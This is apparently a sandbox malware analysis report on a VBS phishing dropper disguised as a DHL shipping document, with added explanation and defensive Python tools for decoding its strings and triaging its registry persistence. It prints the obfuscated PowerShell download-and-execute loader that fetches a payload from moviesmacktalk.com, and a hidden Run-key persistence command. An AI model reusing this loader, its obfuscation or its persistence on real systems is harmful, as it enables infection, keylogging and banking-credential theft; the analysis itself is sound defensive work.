Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 19_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 19_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 19_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 21_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 21_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 22_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 22_2_004072B5

E-Banking Fraud

Source: Yara match File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Source: amsi32_7792.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Initial file: Call Elevarbejder.ShellExecute("P" & Anyone, Ergometercykelen, "", "", Aalegaard)
Source: DHL Shipping Document Awb & BL.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4250
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
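The command line above defines the loader's only string decoder, `Brandmyndighederne`: every literal it receives stores the real text at the odd character positions, with one throw-away filler character in front of each, and the loop copies `Substring($i, $Anthranyl)` for `$i = 1, 3, 5, ...` while `$i -lt Length - $Anthranyl`. `$Anthranyl` is only raised from 0 to 1 when `${host}.CurrentCulture` is set, so in a host without a culture every literal decodes to an empty string and the script is inert, a cheap anti-analysis gate. `Opdateringsprogrammet` passes each decoded string to `& ($Androlepsia)`, and `$Androlepsia` is the decoded literal `'.iYe.xr '`, i.e. `iex`, so every `Opdateringsprogrammet (...)` call is an `Invoke-Expression`. The URL literal holds two download locations separated by the decoded `$shrugging` (`>`), split into `$tilkaldte`, the second being the `moviesmacktalk.com/Nedslagnings.dwp` URL seen in PowerShell memory above; the `https://moviesmacktalk.c`, `.co`, `.com`, ... fragments listed there are consistent with the decoder's character-by-character `+=` leaving each intermediate string on the heap. The Python below is an added example, not part of the report or of the sample: it re-implements the decoder, adds an inverse for building test vectors, and decodes every literal handed to the decoder in a captured command line. The report rendering has collapsed runs of spaces and dropped non-ASCII filler characters (compare `Stumpnser`, `Hjlpeprsters`), so only literals that happened to contain neither decode cleanly from the page text; the ones embedded here do, and the short script fragment is constructed. Run it against the script as captured by process telemetry, not against the rendered report.

```python
"""Added example, not part of the report or of the sample: the string decoder the loader
defines as Brandmyndighederne, its inverse, and a helper that decodes every literal
handed to the decoder in a captured PowerShell command line."""
import re
from typing import Dict, List


def deobfuscate(s: str, width: int = 1) -> str:
    """Mirror of the PowerShell loop:
         for ($i = 1; $i -lt $s.Length - $w; $i += 2) { $out += $s.Substring($i, $w) }
    Real characters sit at odd offsets, each preceded by one throw-away filler.
    $w ($Anthranyl) is 1 only after `If (${host}.CurrentCulture) {$Anthranyl++}` fired;
    with width 0 every Substring($i, 0) is "" and the whole script decodes to nothing."""
    limit = len(s) - width
    return "".join(s[i:i + width] for i in range(1, limit, 2))


def obfuscate(plain: str, filler: str = "x") -> str:
    """Inverse transform for building test vectors (the sample uses random letters,
    punctuation and spaces as filler; one fixed filler is enough to round-trip)."""
    return "".join(filler + c for c in plain) + filler


def decode_literals(script: str, decoder_name: str = "Brandmyndighederne") -> List[str]:
    """Decode each single-quoted literal passed to decoder_name, in source order.
    PowerShell writes a quote inside a single-quoted string as '' so that is allowed."""
    pattern = re.compile(re.escape(decoder_name) + r"\s*\(?\s*'((?:[^']|'')*)'")
    return [deobfuscate(m.group(1).replace("''", "'")) for m in pattern.finditer(script)]


# Literals copied verbatim from the report's command line that survived rendering intact
# (no runs of spaces, no non-ASCII filler), with what they decode to.
PAGE_LITERALS: Dict[str, str] = {
    ".iYe.xr ": "iex",
    "S> ": ">",
    ".URs e rC-KA g.e,n tI ": "User-Agent",
    " $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ":
        "$global:salgsenheders=(cmd /c $Debarrance)",
    ",$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ":
        "$global:tilkaldte=$Lancinated.split($shrugging)",
    # The loop stops before index Length-1, so the 't' at the very end is never read;
    # the script appends it from $salgsenheders[1], the second output line of its cmd /c echo.
    "S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t":
        "$global:Sommerfuglenettets=New-Object System.Net.WebClien",
}

# Constructed fragment in the sample's own style, built only from the verified literals above.
SAMPLE_SCRIPT = (
    "$Androlepsia=Brandmyndighederne '.iYe.xr ';"
    "$shrugging=Brandmyndighederne 'S> ';"
    "Opdateringsprogrammet (Brandmyndighederne '"
    ",$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F "
    "');"
)

if __name__ == "__main__":
    for enc, want in PAGE_LITERALS.items():
        got = deobfuscate(enc)
        print("ok " if got == want else "BAD", repr(got))
    print(decode_literals(SAMPLE_SCRIPT))
    print(repr(deobfuscate(".iYe.xr ", width=0)))  # inert when the culture gate does not fire
```

Because the filler characters are random, a static signature on the literals is pointless; the stable indicators are the decoder's shape (a `SUBsTRIng` built by string concatenation, invoked through `.Invoke($i, $n)` in a step-2 loop) and the `& ($var)` indirection to `iex`, which is what the "obfuscated command line" and "Powershell download and execute" signatures in this report key on.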
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_04586E09 Sleep,LdrInitializeThunk,NtProtectVirtualMemory, 10_2_04586E09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 19_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00401806 NtdllDefWindowProc_W, 19_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004018C0 NtdllDefWindowProc_W, 19_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004016FD NtdllDefWindowProc_A, 21_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004017B7 NtdllDefWindowProc_A, 21_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402CAC NtdllDefWindowProc_A, 22_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402D66 NtdllDefWindowProc_A, 22_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886EEB506 2_2_00007FF886EEB506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF886EEC2B2 2_2_00007FF886EEC2B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0481F1F0 5_2_0481F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0481FAC0 5_2_0481FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0481EEA8 5_2_0481EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B37194 10_2_22B37194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22B2B5C1 10_2_22B2B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B040 19_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043610D 19_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00447310 19_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044A490 19_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040755A 19_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0043C560 19_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B610 19_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044D6C0 19_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004476F0 19_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B870 19_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044081D 19_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00414957 19_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004079EE 19_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00407AEB 19_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044AA80 19_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00412AA9 19_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00404B74 19_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00404B03 19_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044BBD8 19_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00404BE5 19_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00404C76 19_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00415CFE 19_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00416D72 19_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00446D30 19_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00446D8B 19_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406E8F 19_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00405038 21_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0041208C 21_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004050A9 21_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0040511A 21_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0043C13A 21_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004051AB 21_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00449300 21_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0040D322 21_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0044A4F0 21_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0043A5AB 21_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00413631 21_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00446690 21_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0044A730 21_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004398D8 21_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_004498E0 21_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0044A886 21_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0043DA09 21_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00438D5E 21_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00449ED0 21_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_0041FE83 21_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 21_2_00430F54 21_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004050C2 22_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004014AB 22_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00405133 22_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004051A4 22_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00401246 22_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_0040CA46 22_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00405235 22_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004032C8 22_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00401689 22_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00402F60 22_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: DHL Shipping Document Awb & BL.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
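The `REG ADD` above is the persistence step. The Run value `gstes` is written as `REG_EXPAND_SZ`, so the `%Udvalgenes215%` at the head of the data is expanded at logon and the registry value alone does not reveal which binary it resolves to (this section does not show where that variable is set). The data then reads its payload from a second registry value, `Ufuldkommenheds` under `HKCU:\Fiberstof`, and hands it back to the same launcher, so no script file has to survive on disk; if `%Udvalgenes215%` resolves to powershell.exe, `-w 1` is the abbreviated `-WindowStyle` with the numeric value of `Hidden`. The Python below is an added triage helper, not part of the report: it parses a captured `REG ADD` command line and flags those three traits. The allow-list of well-known environment variables, the benign contrast entry and the heuristics are the author's assumptions, not anything the report states.

```python
"""Added triage helper (not from the report): parse a REG ADD command line that writes a
Run value and flag the traits of the persistence entry seen in this sample."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

RUN_KEY_SUFFIXES = ("\\CURRENTVERSION\\RUN", "\\CURRENTVERSION\\RUNONCE")

# Assumption (author's allow-list): variables a legitimate Run entry may start with.
KNOWN_ENV = {"SYSTEMROOT", "WINDIR", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMDATA",
             "LOCALAPPDATA", "APPDATA", "USERPROFILE", "SYSTEMDRIVE", "PUBLIC", "TEMP", "TMP"}

REG_ADD_RE = re.compile(r'^\s*(?:\S*reg(?:\.exe)?\s+)?add\s+"?(?P<key>[^"\s]+)"?(?P<opts>.*)$',
                        re.I | re.S)
ENV_HEAD_RE = re.compile(r'^\s*%([^%]+)%')
REG_READ_RE = re.compile(r'Get-ItemProperty\b.*?\bHK(?:CU|LM|EY_[A-Z_]+)', re.I | re.S)
HIDDEN_RE = re.compile(r'(?<![\w-])-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b', re.I)


@dataclass
class RunEntry:
    key: str
    name: str
    type: str
    data: str


def _opt(opts: str, flag: str) -> str:
    """Value of a /flag option; quoted values may contain spaces and forward slashes."""
    m = re.search(r'/' + flag + r'\s+(?:"(.*?)"(?=\s+/|\s*$)|(\S+))', opts, re.I | re.S)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_reg_add(cmdline: str) -> Optional[RunEntry]:
    """Split `REG ADD <key> ... /v <name> /t <type> /d <data>` into parts; None if not REG ADD."""
    m = REG_ADD_RE.match(cmdline)
    if not m:
        return None
    opts = m.group("opts")
    return RunEntry(m.group("key"), _opt(opts, "v"), _opt(opts, "t") or "REG_SZ", _opt(opts, "d"))


def assess(entry: RunEntry) -> List[str]:
    """Findings for a Run/RunOnce value; an empty list means nothing in the data stood out."""
    findings: List[str] = []
    if not entry.key.upper().endswith(RUN_KEY_SUFFIXES):
        return findings
    head = ENV_HEAD_RE.match(entry.data)
    if head and head.group(1).upper() not in KNOWN_ENV:
        note = "launcher is the non-standard variable %{}%".format(head.group(1))
        if entry.type.upper() == "REG_EXPAND_SZ":
            note += " (REG_EXPAND_SZ: resolved at logon, target not recorded in the key)"
        findings.append(note)
    if REG_READ_RE.search(entry.data):
        findings.append("payload read from another registry value at run time (no script file on disk)")
    if HIDDEN_RE.search(entry.data):
        findings.append("hidden window requested (-w 1 / -WindowStyle Hidden)")
    return findings


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Map each Run value name to its findings."""
    result: Dict[str, List[str]] = {}
    for cmdline in cmdlines:
        entry = parse_reg_add(cmdline)
        if entry is not None:
            result[entry.name] = assess(entry)
    return result


SAMPLE_CMDLINES = [
    # The reg.exe command line from this report, as cmd.exe spawned it.
    'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "gstes" /t REG_EXPAND_SZ '
    '/d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path \'HKCU:\\Fiberstof\\\').Ufuldkommenheds;'
    '%Udvalgenes215% ($Kofta)"',
    # Constructed benign entry for contrast (not from the report).
    'reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDrive /t REG_EXPAND_SZ '
    '/d "%LOCALAPPDATA%\\Microsoft\\OneDrive\\OneDrive.exe /background"',
]

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_CMDLINES).items():
        print(name, "->", findings or ["nothing flagged"])
```

When responding, dump both `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gstes` and the payload value under `HKCU\Fiberstof` before cleaning, and capture the user's environment block (or the process that set `Udvalgenes215`) so the launcher the expand-string points at is recorded; the Run value by itself will not tell you.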
Source: amsi32_7792.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 19_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 22_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 19_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 19_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 19_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Proskriberes.Bet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7792
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
